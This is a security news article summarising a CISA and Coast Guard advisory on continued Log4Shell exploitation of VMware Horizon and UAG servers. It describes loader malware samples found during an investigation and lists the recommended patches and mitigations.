CISA and the United States Coast Guard Cyber Command (CGCYBER) are warning that the threat of Log4Shell hasn’t gone away. It’s being actively exploited and used to target organisations using VMware Horizon and Unified Access Gateway servers.
Log4Shell: what is it?
Log4Shell was a zero-day vulnerability in something called Log4j. This open source logging library written in Java is used by millions of applications, many of them incredibly popular. The easy to trigger attack could be used to perform remote code execution (RCE) on vulnerable systems. If successful, attackers could gain full control over a target system. If they managed to have affected apps log a special string, then it was a case of game over. The system(s) at this point would be ripe for exploitation.
Discovered in November 2021, the exploit was estimated to potentially affect hundreds of millions of devices. With so much potential for damage, fixes were quickly developed and released on December 6, three days before the vulnerability was published.
Related bugs and additional vulnerabilities were also discovered and subsequently patched.
Broadening Log4Shell’s horizons
According to CISA and CGCYBER, Log4Shell has been used to exploit unpatched, public-facing VMWare Horizon and UAG servers. Suspected APT threat actors…
…implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
Attackers not only make use of malware and HTTP, but also PowerShell scripts and Remote Desktop Protocol (RDP). In the latter’s case, this was to further move around the network and other hosts inside the organisation’s production environment.
Compromised administrator accounts were used to run several additional forms of loader malware. Here are some of the samples found by CISA during one investigation:
- SvcEdge.exe is a malicious Windows loader containing encrypted executable f7_dump_64.exe. When executed, SvcEdge.exe decrypts and loads f7_dump_64.exe into memory.
- odbccads.exe is a malicious Windows loader containing an encrypted executable. When executed, odbccads.exe decrypts and loads the executable into memory.
- praiser.exe is a Windows loader containing an encrypted executable. When executed, praiser.exe decrypts and loads the executable into memory.
- fontdrvhosts.exe is a Windows loader that contains an encrypted executable. When executed, fontdrvhosts.exe decrypts and loads the executable into memory.
- winds.exe is a Windows loader containing an encrypted malicious executable and was found on a server running as a service. During runtime, the encrypted executable is decrypted and loaded into memory. winds.exe has complex obfuscation, hindering the analysis of its code structures.
Advice for securing installations
CISA/CGCYBER are quite clear about this. Organisations which haven’t applied patches released back in December should treat any and all affected VMware systems as compromised:
- Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
- Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services.
- See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
- Note: Until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
- If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible.
- Prior to implementing any temporary solution, ensure appropriate backups have been completed.
- Verify successful implementation of mitigations by executing the vendor supplied script
without parameters to ensure that no vulnerabilities remain. See KB87073 for details.
Log4Shell, rated a 10 in the Common Vulnerability Scoring System (CVSS), is not to be trifled with. We advise affected organisations to pay heed to the warnings above and set about patching as soon as possible.